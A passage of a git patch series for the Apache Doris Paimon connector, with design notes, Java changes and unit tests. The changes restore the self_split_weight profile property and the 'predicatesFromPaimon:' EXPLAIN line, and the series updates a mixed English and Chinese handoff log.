JNI splits whose genuine weight is 0 — **should** emit (this is the bug). + +The property is **consumed** only on the JNI branch of `populateRangeParams:185-197` +(inside `if (paimonSplitVal != null)`), via `rangeDesc.setSelfSplitWeight(...)`. It feeds only BE's +`_max_time_split_weight_counter` (`be/.../jni_reader.cpp:246`, a `ConditionCounter`) — a **profile +counter**. It never influences rows / counts / predicates / schema / routing. + +## Legacy parity (the authoritative reference) + +`PaimonScanNode.setPaimonParams` (fe-core `datasource/paimon/source/PaimonScanNode.java:253-287`): + +- **JNI/cpp branch** (`split != null`, line 274): `rangeDesc.setSelfSplitWeight(paimonSplit.getSelfSplitWeight())` + — **unconditional**, no `> 0` guard. Emitted for every JNI split including weight 0. +- **Native branch** (`split == null`, lines 275-287): `setSelfSplitWeight` is **never called**. + Native splits never carry the thrift weight → BE defaults `-1`. + +So legacy's rule is simply: **emit the weight iff the split is a JNI split.** + +## Design + +Change the constructor gate from a value check to the JNI-split check, exactly mirroring legacy and +making the property's lifecycle symmetric (emitted iff consumed — `populateRangeParams` reads it only +when `paimon.split` is present): + +```java +// FIX-A3: emit the self-split-weight for every JNI split, incl. weight 0. Legacy +// PaimonScanNode.setPaimonParams:274 sets it unconditionally on the JNI branch (never on native); +// the old `selfSplitWeight > 0` gate was a buggy is-set proxy that dropped a genuine weight-0 JNI +// split (rowCount-0 sys split / fileSize-0 DataSplit) -> BE read the -1 "unset" sentinel instead of +// 0, corrupting the profile _max_time_split_weight_counter. Gate on the JNI marker (paimonSplit) so +// native splits keep parity (no weight); this is also exactly when populateRangeParams reads it. +if (builder.paimonSplit != null) { + props.put("paimon.self_split_weight", String.valueOf(builder.selfSplitWeight)); +} +``` + +### Why gate on `paimonSplit != null`, not `>= 0` + +`task-list-P6-deviation-fixes.md` §A3 phrases the fix as "drop the `> 0` gate ... always emit." Since +the weight is always ≥ 0 (a fileSize-sum or a `rowCount()`; `computeSplitWeight:885-891`), "drop the +gate" / `>= 0` / `paimonSplit != null` are all behaviorally identical at the **BE thrift level** for +JNI splits — they all emit the genuine weight incl. 0. The choice below is only about which form is the +cleanest, most legacy-faithful expression. + +Both fix the reported bug (BE thrift identical for JNI). But `>= 0` would also start writing +`paimon.self_split_weight=0` into the **props map of native splits** (they default to weight 0). +That key is never read on the native branch, so it is harmless to BE — but it is a needless divergence +from legacy (which never set the weight on native) and a cosmetic change to native splits' internal +props. Gating on the JNI marker: +- emits 0 for JNI splits (fixes A3), +- never adds the key to native splits (exact legacy parity, no cosmetic drift), +- is symmetric with the consumer (`populateRangeParams` reads it iff `paimon.split` present). + +Both JNI build sites (`buildJniScanRange:742-748`, `buildCountRange:773-781`) always call +`.paimonSplit(...)` **and** `.selfSplitWeight(...)`, so this never under-emits for a real JNI split. + +## Implementation Plan + +Single-line change in `fe/fe-connector/fe-connector-paimon/.../PaimonScanRange.java` constructor +(line 92): replace `if (builder.selfSplitWeight > 0)` with `if (builder.paimonSplit != null)` + the +explanatory comment above. + +No SPI/interface change, no BE change, no other call-site change. + +## Risk Analysis + +- **Native splits:** unchanged at the BE thrift level (native branch of `populateRangeParams` never + reads/sets the weight). With the JNI-marker gate they also keep an unchanged props map (no new key). +- **JNI splits with weight > 0:** unchanged (still emitted). +- **JNI splits with weight 0:** now emit `0` (the fix). BE reads `0` instead of `-1` — corrects the + profile counter; no functional path touched. +- **Negative weight:** not reachable — weight is a fileSize-sum or a `rowCount()`, both ≥ 0. Even if + it were, legacy emitted unconditionally, so emitting it is parity-correct. +- No correctness/perf/route impact — profile-only. No regression test currently asserts this line + (so nothing to update; we ADD coverage). + +## Test Plan + +### Unit Tests (fe-connector-paimon, `org.apache.doris.connector.paimon`) + +New `PaimonScanRangeSelfSplitWeightTest` (direct `PaimonScanRange.Builder`, same style as +`PaimonScanRangePartitionNullTest`). No existing test asserts `self_split_weight` (verified: 0 hits in +the test tree) → all three are NEW coverage, nothing to update. + +1. **JNI split, weight 0 — the fix, BE-visible (load-bearing):** drive `populateRangeParams` and + assert `rangeDesc.isSetSelfSplitWeight() && rangeDesc.getSelfSplitWeight() == 0` — this is the + legacy `:274` parity target and proves BE reads `0`, not the `-1` unset sentinel. Also assert the + props map carries `paimon.self_split_weight == "0"`. RED before: with the `> 0` gate, prop absent + → `populateRangeParams` never calls `setSelfSplitWeight` → `isSetSelfSplitWeight()` false → BE -1. +2. **JNI split, weight > 0 — positive coverage (NEW):** prop present and matches; pins the positive + case keeps working (no prior test covered it). +3. **Native split (no `paimonSplit`) — native unaffected, BE-visible:** drive `populateRangeParams` + on a native range and assert `!rangeDesc.isSetSelfSplitWeight()` (native never carries the weight, + legacy parity — native branch sets ORC/PARQUET, never the weight). Additionally assert the props + map does NOT contain `paimon.self_split_weight` — this is the only assertion that pins the chosen + JNI-marker gate over `>= 0` (with `>= 0`, native gains a BE-invisible `=0` key); labeled as the + gate-choice pin, distinct from the BE-visible parity assertion above. + +RED→GREEN mutation: restoring the old `> 0` gate turns test 1 red (weight-0 JNI: prop absent + +`isSetSelfSplitWeight()` false). Switching to `>= 0` turns test 3's props-key-absent assertion red. + +### E2E Tests + +None. Profile-counter parity is not asserted by any regression suite and constructing a deterministic +weight-0 JNI split end-to-end (paimon SDK split with rowCount 0 / fileSize 0) is not worth a live +suite for a NIT. e2e is gated (`enablePaimonTest=false`) regardless. + +## Build / Verify + +- `mvn -f .../fe/pom.xml -pl :fe-connector-paimon -am package -Dassembly.skipAssembly=true + -Dmaven.build.cache.enabled=false -DfailIfNoTests=false` (HiveConf in shade jar; checkstyle in + `validate`). +- `tools/check-connector-imports.sh` must stay exit 0 (no fe-core import added). +- Confirm the new test fails on the pre-fix gate (mutation), passes on the fix. diff --git a/plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-summary.md b/plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-summary.md new file mode 100644 index 00000000000000..14e7131db63156 --- /dev/null +++ b/plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-summary.md @@ -0,0 +1,62 @@ +# FIX-A3 — JNI split `self_split_weight` omitted when weight is 0 — SUMMARY + +> P6 deviation→fix (1 of 5). Severity NIT (profile-parity only). Design + design red-team +> (`wf_3f2cd605-2a8`, 9 candidates → 0 actionable on the code) + RED→GREEN UT + impl-verify (APPROVE). + +## Problem + +The paimon connector emitted the BE thrift profile property `paimon.self_split_weight` only when the +computed weight was `> 0`. A JNI split whose genuine weight is exactly **0** (a non-`DataSplit` system +split with `rowCount()==0`, or a `DataSplit` whose files sum to `fileSize==0`) therefore left the +property unset, and BE fell back to the `-1` "unset" sentinel instead of `0`. + +## Root Cause + +`PaimonScanRange` constructor gated on the value: `if (builder.selfSplitWeight > 0)` +(`fe-connector-paimon/.../PaimonScanRange.java:92`). `selfSplitWeight` is a primitive `long` +defaulting to `0`, so the `> 0` check doubled as a crude "is-set?" proxy — conflating native splits +(which never set a weight, default 0; correctly suppressed) with JNI splits whose genuine weight is 0 +(incorrectly suppressed). The property is consumed only on the JNI branch of `populateRangeParams` +and feeds only BE's `_max_time_split_weight_counter` profile counter (`jni_reader.cpp:246`); BE +defaults to `-1` when the thrift field is unset (`paimon_jni_reader.cpp:95`). + +Legacy `PaimonScanNode.setPaimonParams:274` sets the weight **unconditionally on the JNI branch and +never on the native branch** — so the parity rule is simply "emit iff JNI split." + +## Fix + +One-line gate change (+ explanatory comment) in `PaimonScanRange` constructor: + +```java +if (builder.paimonSplit != null) { // was: if (builder.selfSplitWeight > 0) + props.put("paimon.self_split_weight", String.valueOf(builder.selfSplitWeight)); +} +``` + +Gating on the JNI marker (`paimonSplit`) rather than the value emits the genuine weight (incl. 0) for +every JNI split, never adds the key to native splits (exact legacy parity, no cosmetic drift), and is +symmetric with the consumer (`populateRangeParams` reads the prop iff `paimon.split` present). Both +JNI build sites (`buildJniScanRange`, `buildCountRange`) always set both `paimonSplit` and +`selfSplitWeight`, so the gate can neither under- nor over-emit; weight is provably ≥ 0 +(fileSize-sum / `rowCount()`), so this is BE-thrift-identical to the task-list's literal "drop the +`> 0` gate" while being the cleanest, most legacy-faithful form. No SPI/interface/BE change. + +## Tests + +New `PaimonScanRangeSelfSplitWeightTest` (3 tests, direct `PaimonScanRange.Builder`): +1. **JNI split, weight 0** — drives `populateRangeParams` and asserts `isSetSelfSplitWeight()` && + `getSelfSplitWeight()==0` (BE-visible, load-bearing) + props `"0"`. **RED before** the fix + (verified by an actual run: 1 failure on unfixed code — prop absent → thrift unset → BE -1). +2. **JNI split, weight > 0** — positive coverage (no prior test asserted this property). +3. **Native split** — `!isSetSelfSplitWeight()` (BE-visible native parity) + props key absent + (gate-choice pin: switching to `>= 0` would make this RED). + +## Result + +- RED→GREEN verified by separate runs: unfixed → 1 failure (test 1); fixed → **3/0/0**. +- Full paimon module: **283 run / 0 failures / 0 errors / 1 skipped** (gated e2e); checkstyle 0 + violations; `tools/check-connector-imports.sh` exit 0. +- Design red-team (3 lenses → verifier): core fix CONFIRMED correct; only doc/test-plan refinements + (folded in). Impl-verify reviewer: **APPROVE**, no actionable issues. +- e2e is gated (`enablePaimonTest=false`) — NOT run (profile-counter parity is not asserted by any + regression suite). diff --git a/plan-doc/task-list-P6-deviation-fixes.md b/plan-doc/task-list-P6-deviation-fixes.md index d5002253ac5ba1..ea717dec6a64cc 100644 --- a/plan-doc/task-list-P6-deviation-fixes.md +++ b/plan-doc/task-list-P6-deviation-fixes.md @@ -21,7 +21,11 @@ A3 → A2 → B-MC2 → A1 → B-R2-be ## A3 — JNI split `self_split_weight` omitted when weight is 0 (NIT / profile-parity) -- [ ] **A3** +- [x] **A3** — DONE. Gate changed from `selfSplitWeight > 0` to `paimonSplit != null` in + `PaimonScanRange` ctor (emit-iff-JNI = legacy `PaimonScanNode.setPaimonParams:274` parity); new + `PaimonScanRangeSelfSplitWeightTest` (3, RED→GREEN verified by separate runs); 283/0/0/1skip, + checkstyle 0, import-check 0; design red-team 0-actionable, impl-verify APPROVE. See + `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`. - **Finding:** report §R1 (be). The connector gates `paimon.self_split_weight` emission on `selfSplitWeight > 0`, so a JNI split whose computed weight is exactly 0 (non-DataSplit sys split with `rowCount()==0`, or a DataSplit with total fileSize 0) leaves the prop unset → BE reads `-1` instead of `0`. Legacy emitted it unconditionally. From 2239a0a87f15a7da2e5a9c13218faa954f44583f Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 13:22:25 +0800 Subject: [PATCH 112/128] =?UTF-8?q?docs(catalog-spi):=20P6=20A3=20(self=5F?= =?UTF-8?q?split=5Fweight)=20fix=20done=20=E2=86=92=20HANDOFF=20next=20=3D?= =?UTF-8?q?=20A2?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 27 +++++++++++++++++++-------- 1 file changed, 19 insertions(+), 8 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 3e0f808569bfe7..0dfd7278e9f3f9 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,11 +6,18 @@ --- -# 🎯 下一个 session 的任务 — **5 个 deviation→fix(A1/A2/A3 + B-R2-be/B-MC2,逐一修)→ 见 `task-list-P6-deviation-fixes.md`** +# 🎯 下一个 session 的任务 — **A2(EXPLAIN 重发 `predicatesFromPaimon:`)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ 已完成 `5fa47c27eb8`**,剩 A2 / B-MC2 / A1 / B-R2-be,逐一修) > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 > **✅ C1 (MinIO, MAJOR) `9967846ef64`** / **✅ C2 (HDFS XML, MAJOR) `e95128aed5b`** / **✅ R3-residual (MINOR) `44499f073e8`**(详见 git log + 各自 design/summary)。 +> **✅ A3 (NIT, profile-parity, deviation 1/5) `5fa47c27eb8`**:`PaimonScanRange` ctor 发 `paimon.self_split_weight` 的闸由 +> 值判断 `selfSplitWeight > 0` 改为 JNI 标记 `paimonSplit != null`——weight=0 的 JNI split(rowCount-0 系统表 split / +> fileSize-0 DataSplit)现也发 0,BE 不再读 -1 哨兵(profile counter `_max_time_split_weight_counter`);= legacy +> `PaimonScanNode.setPaimonParams:274`(JNI 臂无条件、native 臂从不发)parity。新 `PaimonScanRangeSelfSplitWeightTest`(3, +> **RED→GREEN 两次独立跑验证**:未修代码 weight-0 测失败 1,修后 3/0);283/0/0/1skip + checkstyle0 + import0;design 红队 +> `wf_3f2cd605-2a8`(9 候选→0-actionable on code)、impl-verify **APPROVE**;e2e gated 未跑。详见 +> `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 > **✅ R3-residual (MINOR) 已完成**:去 `PluginDrivenScanNode.getNodeExplainString` 的 `"paimon".equals(getType())` > gate,VERBOSE backends 块改无条件 emit(gate 变 `VERBOSE && !isBatchMode()`,与父 `FileScanNode` 完全一致)+ 重写假注释。 > **红队纠正了 scope**(比 review 的「maxcompute」更广):`SPI_READY_TYPES={jdbc,es,trino-connector,max_compute,paimon}` 全走 @@ -36,8 +43,8 @@ > `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 > gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 > 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 -> **下一个 = 5 个 deviation→fix(用户决定修,非接受)**:从 P6-DEVIATIONS 里挑出 5 项转 fix,逐一走单任务循环 -> (详单见 **`task-list-P6-deviation-fixes.md`**,建议序 A3→A2→B-MC2→A1→B-R2-be):**A1** 插件 split 比例权重 +> **下一个 = A2(A3 已完成 `5fa47c27eb8`);剩 4 个 deviation→fix(用户决定修,非接受)**:逐一走单任务循环 +> (详单见 **`task-list-P6-deviation-fixes.md`**,剩余建议序 A2→B-MC2→A1→B-R2-be):**A1** 插件 split 比例权重 > (SPI `ConnectorScanRange` 加 `getSelfSplitWeight/getTargetSplitSize` + `PluginDrivenSplit` ctor 回填,连接器已算好只是没传 FE > FileSplit);**A2** 重发 EXPLAIN `predicatesFromPaimon:`(连接器 `appendExplainInfo` 重转 filter);**A3** 去 > `paimon.self_split_weight` 的 `>0` 闸(weight=0 也发,profile parity);**B-R2-be** schema-evolution 字典收窄到 @@ -94,8 +101,11 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 `PaimonExternalMetaCache`,键确死);R3-catalog **rethrow**(用户拍板)`RuntimeException` 带 catalog 名,与 legacy `PaimonMetadataOps:340` 一致(原吞成 emptyList)。280/0+16/0+3/0+14/0+12/0;checkstyle 0;两道红队 0-actionable。 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`。 - - **5 个 deviation→fix(下一个,用户决定修)**:A1/A2/A3 + B-R2-be/B-MC2,逐一走单任务循环。完整详单(机制/修法/文件/ - **两个 B 项的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 A3→A2→B-MC2→A1→B-R2-be。 + - ✅ **A3**(NIT profile-parity)— **DONE `5fa47c27eb8`**:`PaimonScanRange` ctor `self_split_weight` 闸 `>0`→ + `paimonSplit != null`(emit-iff-JNI = legacy `PaimonScanNode:274` parity);weight-0 JNI 现发 0;新 UT 3 RED→GREEN; + 283/0/0/1skip。详见 `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 + - **剩 4 个 deviation→fix(下一个 = A2,用户决定修)**:A2 + B-MC2 + A1 + B-R2-be,逐一走单任务循环。完整详单(机制/ + 修法/文件/**两个 B 项的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 A2→B-MC2→A1→B-R2-be。 - **P6-DEVIATIONS 余项(5 项之后,本批最后一项)**:未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常(R3/R4/R5/R6 residual 属 B8 清理、2 BLOCKER 属 B8 护栏, 均不在此)。逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 @@ -121,9 +131,10 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `82b6de0de98`**(P6 修复 C4/R2/R3 合一;前序 `f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); - 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, - force-with-lease)。 +- **HEAD = `5fa47c27eb8`**(FIX-A3 self_split_weight;前序 `82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); + remote `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head)仍在 `82b6de0de98`, + **本地领先:A3 起的 deviation fix commits 尚未 push** → 待本批 deviation fix 做完,session 收尾一次性 + force-with-lease push + PR 评论 `run buildall`(见 §Commit 须知 / memory `catalog-spi-07-paimon-branch-pr-workflow`)。 - **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 (FIX-1 `c376aba1264` rest-vended-uri / FIX-2 `2e845e88bf9` jni-file-format / FIX-3 `f08bc22b9bd` incr-scan-reset / FIX-4 `f0210b51871` feconf-storage-parity)。详见 `task-list-P5-rereview3-fixes.md` + `reviews/P5-paimon-rereview3-2026-06-12.md`。 From 1935748d6c3a8846d5702a9cce60bc412eadf49a Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 14:01:11 +0800 Subject: [PATCH 113/128] =?UTF-8?q?fix:=20FIX-A2=20=E2=80=94=20re-emit=20p?= =?UTF-8?q?redicatesFromPaimon=20EXPLAIN=20line=20for=20paimon=20scans?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: legacy PaimonScanNode.getNodeExplainString:660-668 printed the Paimon Predicate objects actually pushed to the SDK (or NONE), but the SPI scan path dropped it. The connector's appendExplainInfo emitted only paimonNativeReadSplits= + VERBOSE PaimonSplitStats, and the generic node emits PREDICATES: (the Doris-level conjuncts), NOT the SDK-converted set. Since PaimonPredicateConverter silently drops unconvertible conjuncts (LTZ/FLOAT/ unsupported CAST), the pushed subset was no longer observable. Solution: in appendExplainInfo, deserialize the already-present paimon.predicate prop (the exact List pushed to BE, always serialized at getScanNodeProperties:579) and render the legacy block, placed between the paimonNativeReadSplits= line and the VERBOSE PaimonSplitStats block (exact legacy order PaimonScanNode:657-671). New private helper appendPredicatesFromPaimon. Chosen over re-running the converter: the filter is not in the SPI seam (carries only the props map) and the provider is re-instantiated per call (no field), so deserializing the existing prop is the smallest faithful change -- no SPI change, no new prop, no redundant serialization. Gated on paimon.predicate != null (absent != empty -> skip, preserving the existing exact-equality explain tests); decode failure -> LOG.warn + skip (never breaks EXPLAIN). Tests: 4 new PaimonScanExplainTest (build paimon.predicate exactly as production does): non-empty emit (exact-equality incl double-prefix indent), empty -> NONE, ordering (native < predicates < stats), absent -> skip. RED->GREEN by separate runs (3 fail unfixed -> 0). 287/0/0/1skip module-wide; checkstyle 0; import 0. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 53 ++++++ .../paimon/PaimonScanExplainTest.java | 108 +++++++++++ .../FIX-A2-PREDICATES-FROM-PAIMON-design.md | 177 ++++++++++++++++++ .../FIX-A2-PREDICATES-FROM-PAIMON-summary.md | 65 +++++++ plan-doc/task-list-P6-deviation-fixes.md | 7 +- 5 files changed, 409 insertions(+), 1 deletion(-) create mode 100644 plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-design.md create mode 100644 plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-summary.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 1ac2edc6e3e950..6d33ddf4ccb6a4 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -1121,6 +1121,18 @@ public void appendExplainInfo(StringBuilder output, String prefix, if (nativeSplits != null && totalSplits != null) { output.append(prefix).append("paimonNativeReadSplits=") .append(nativeSplits).append("/").append(totalSplits).append("\n"); + // FIX-A2 (explain gap): re-emit the legacy predicatesFromPaimon: block (the Paimon Predicate + // objects actually pushed to the SDK, or NONE) BETWEEN paimonNativeReadSplits= and the VERBOSE + // PaimonSplitStats block -- legacy order PaimonScanNode:657-671. It logically depends only on + // paimon.predicate and is nested in this native-splits block SOLELY so the legacy ordering + // holds (in a real EXPLAIN the synthetic split keys are always injected, so the gate always + // passes). The pushed list is already serialized into paimon.predicate (getScanNodeProperties: + // 579, always emitted), so deserialize+render it rather than re-converting (the filter is not + // in the seam). + String encodedPredicates = nodeProperties.get("paimon.predicate"); + if (encodedPredicates != null) { + appendPredicatesFromPaimon(output, prefix, encodedPredicates); + } if (nodeProperties.containsKey(VERBOSE_EXPLAIN_KEY)) { appendSplitStats(output, prefix, Integer.parseInt(nativeSplits), Integer.parseInt(totalSplits)); @@ -1128,6 +1140,47 @@ public void appendExplainInfo(StringBuilder output, String prefix, } } + /** + * FIX-A2 (explain gap): renders the legacy {@code predicatesFromPaimon:} EXPLAIN block from the + * {@code paimon.predicate} prop (the base64 {@link InstantiationUtil}-serialized + * {@code List} pushed to the SDK by {@link #getScanNodeProperties}). Lists each pushed + * predicate (double-prefix indented) or {@code NONE} when the list is empty, byte-faithful to + * {@code PaimonScanNode.java:660-668}. Diagnostic-only: surfaces a conjunct that + * {@link PaimonPredicateConverter} silently dropped (LTZ / FLOAT / unsupported CAST), so this can list + * fewer entries than the generic {@code PREDICATES:} line. A decode failure is logged and the line + * skipped -- it must never break EXPLAIN. + */ + @SuppressWarnings("unchecked") + private static void appendPredicatesFromPaimon(StringBuilder output, String prefix, String encoded) { + List predicates; + try { + // paimon.predicate is standard-Base64 by construction (encodeObjectToString -> BASE64_ENCODER + // = Base64.getEncoder()), so a standard decoder is the exact inverse. Decode with the paimon + // SDK's own classloader (the plugin CL that loaded Predicate), independent of the TCCL. + byte[] bytes = Base64.getDecoder().decode(encoded); + predicates = InstantiationUtil.deserializeObject( + bytes, org.apache.paimon.predicate.Predicate.class.getClassLoader()); + } catch (Exception e) { + // Diagnostic line only -- never break EXPLAIN. The prop is produced by us, so a decode failure + // is a real bug; log + skip rather than render a misleading NONE. + LOG.warn("Failed to decode paimon.predicate for EXPLAIN predicatesFromPaimon", e); + return; + } + if (predicates == null) { + // unexpected payload -- skip (do not render a misleading NONE), consistent with the catch path. + return; + } + output.append(prefix).append("predicatesFromPaimon:"); + if (predicates.isEmpty()) { + output.append(" NONE\n"); + } else { + output.append("\n"); + for (org.apache.paimon.predicate.Predicate predicate : predicates) { + output.append(prefix).append(prefix).append(predicate).append("\n"); + } + } + } + /** * FIX-E (explain gap): re-emits the legacy {@code PaimonScanNode} VERBOSE {@code PaimonSplitStats:} * block — one {@code SplitStat [type=NATIVE|JNI]} line per split. The generic diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java index aa2497056e0ecb..ef15cbef59edbf 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java @@ -20,9 +20,16 @@ import org.apache.doris.thrift.TFileRangeDesc; import org.apache.doris.thrift.TTableFormatFileDesc; +import org.apache.paimon.predicate.Predicate; +import org.apache.paimon.predicate.PredicateBuilder; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.InstantiationUtil; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.util.Base64; +import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; @@ -249,4 +256,105 @@ public void countRangeCarriesRowCountAndIsNotNative() { Assertions.assertFalse(range.isNativeReadRange()); Assertions.assertEquals(12L, range.getPushDownRowCount()); } + + // ==================== FIX-A2: predicatesFromPaimon block ==================== + + /** Serializes a predicate list into the paimon.predicate prop EXACTLY as production does + * (PaimonScanPlanProvider.encodeObjectToString = InstantiationUtil.serializeObject + Base64). */ + private static String encodePredicates(List predicates) throws Exception { + return Base64.getEncoder().encodeToString(InstantiationUtil.serializeObject(predicates)); + } + + private static Predicate intEqPredicate() { + RowType rowType = RowType.builder().field("id", DataTypes.INT()).build(); + return new PredicateBuilder(rowType).equal(0, 5); + } + + @Test + public void appendExplainInfoEmitsPredicatesFromPaimonForPushedPredicate() throws Exception { + // WHY: legacy PaimonScanNode:660-668 listed the Paimon Predicate objects actually pushed to the + // SDK; the SPI path dropped it. The connector re-renders it by deserializing the already-present + // paimon.predicate prop. With a non-empty list, the block is "predicatesFromPaimon:\n" + one + // double-prefix-indented line per predicate. MUTATION: dropping the block (the pre-fix state) or + // mis-indenting -> red. + Predicate p = intEqPredicate(); + Map props = new HashMap<>(); + props.put("__native_read_splits", "1"); + props.put("__total_read_splits", "2"); + props.put("paimon.predicate", encodePredicates(Collections.singletonList(p))); + + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, " ", props); + + // paimonNativeReadSplits= first, then predicatesFromPaimon: with the predicate double-indented + // (prefix+prefix), matching legacy ordering and format byte-for-byte. + Assertions.assertEquals( + " paimonNativeReadSplits=1/2\n" + + " predicatesFromPaimon:\n" + + " " + p.toString() + "\n", + out.toString()); + } + + @Test + public void appendExplainInfoEmitsPredicatesFromPaimonNoneForEmptyList() throws Exception { + // WHY: legacy rendered " NONE" when the pushed predicate list is empty (no pushable filter). The + // empty list still serializes to a non-null paimon.predicate (getScanNodeProperties:579 always + // emits it). MUTATION: skipping the line for empty, or rendering it differently than " NONE" -> red. + Map props = new HashMap<>(); + props.put("__native_read_splits", "1"); + props.put("__total_read_splits", "2"); + props.put("paimon.predicate", encodePredicates(Collections.emptyList())); + + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, " ", props); + + Assertions.assertEquals( + " paimonNativeReadSplits=1/2\n" + + " predicatesFromPaimon: NONE\n", + out.toString()); + } + + @Test + public void appendExplainInfoOrdersPredicatesBetweenNativeSplitsAndVerboseStats() throws Exception { + // WHY: legacy order is paimonNativeReadSplits -> predicatesFromPaimon -> VERBOSE PaimonSplitStats + // (PaimonScanNode:657-671). Pins that the new block lands between the two. MUTATION: emitting + // predicatesFromPaimon after PaimonSplitStats (wrong placement) -> red. + Predicate p = intEqPredicate(); + Map props = new HashMap<>(); + props.put("__native_read_splits", "0"); + props.put("__total_read_splits", "2"); + props.put("__explain_verbose", "true"); + props.put("paimon.predicate", encodePredicates(Collections.singletonList(p))); + + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, "", props); + + String text = out.toString(); + int iNative = text.indexOf("paimonNativeReadSplits="); + int iPreds = text.indexOf("predicatesFromPaimon:"); + int iStats = text.indexOf("PaimonSplitStats:"); + Assertions.assertTrue(iNative >= 0 && iPreds >= 0 && iStats >= 0, text); + Assertions.assertTrue(iNative < iPreds && iPreds < iStats, + "order must be paimonNativeReadSplits < predicatesFromPaimon < PaimonSplitStats: " + text); + } + + @Test + public void appendExplainInfoSkipsPredicatesFromPaimonWhenPropAbsent() { + // WHY: absent paimon.predicate != empty list. When the prop is missing (another connector's props, + // or a path that did not build it) the line must be SKIPPED, not rendered as " NONE". This is why + // every existing exact-equality test above (none set paimon.predicate) stays green. Mirrors the + // sibling appendExplainInfoSkipsWhenSyntheticKeysAbsent guard. MUTATION: rendering " NONE" on a + // null prop -> red here AND breaks the existing exact-equality tests. + Map props = new HashMap<>(); + props.put("__native_read_splits", "1"); + props.put("__total_read_splits", "2"); + + StringBuilder out = new StringBuilder(); + provider().appendExplainInfo(out, " ", props); + + String text = out.toString(); + Assertions.assertTrue(text.contains("paimonNativeReadSplits=1/2"), text); + Assertions.assertFalse(text.contains("predicatesFromPaimon"), + "predicatesFromPaimon must be skipped when paimon.predicate is absent: " + text); + } } diff --git a/plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-design.md b/plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-design.md new file mode 100644 index 00000000000000..9da30d5ffee1df --- /dev/null +++ b/plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-design.md @@ -0,0 +1,177 @@ +# FIX-A2 — EXPLAIN drops legacy `predicatesFromPaimon:` line + +> Source: `task-list-P6-deviation-fixes.md` §A2 / `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R2 (scan). +> Severity: **MINOR** (diagnostic-only; no correctness/perf impact). Deviation 2/5. + +## Problem + +Legacy 